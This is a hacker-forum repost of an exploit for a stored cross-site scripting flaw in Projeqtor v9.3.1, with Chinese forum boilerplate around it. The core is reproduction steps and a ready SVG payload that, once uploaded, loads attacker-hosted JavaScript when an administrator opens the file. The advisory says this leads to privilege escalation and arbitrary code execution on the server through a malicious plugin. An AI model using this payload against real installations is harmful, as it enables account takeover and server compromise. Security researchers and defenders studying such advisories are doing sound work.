Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS) - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月3日2年前

# Exploit Title: Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)
# Exploit Author: Oscar Gutierrez (m4xp0w3r)
# Date: January 4, 2021
# Vendor Homepage: https://www.projeqtor.org/en/
# Software Link: https://www.projeqtor.org/en/product-en/downloads
# Tested on: Ubuntu, LAAMP
# Vendor: Projeqtor
# Version: v9.3.1

# Exploit Description:
Projeqtor version 9.3.1 suffers from a stored XSS vulnerability via SVG file upload. A low level user can upload svg images that contain malicious Javascript. In this way an attacker can escalate privileges and upload a malicious plugin which results in arbitrary code execution in the server hosting the application.

# Steps to reproduce:
Upload the following XML code as an SVG file and change the xlink for a location that you control. Once the administrator user opens the attachment, the Javascript code hosted by the attacker will execute.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
    <script xlink:href="<script src=CHANGE THIS FOR THE LOCATION OF YOUR SCRIPT></script>"></script>
</svg>

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索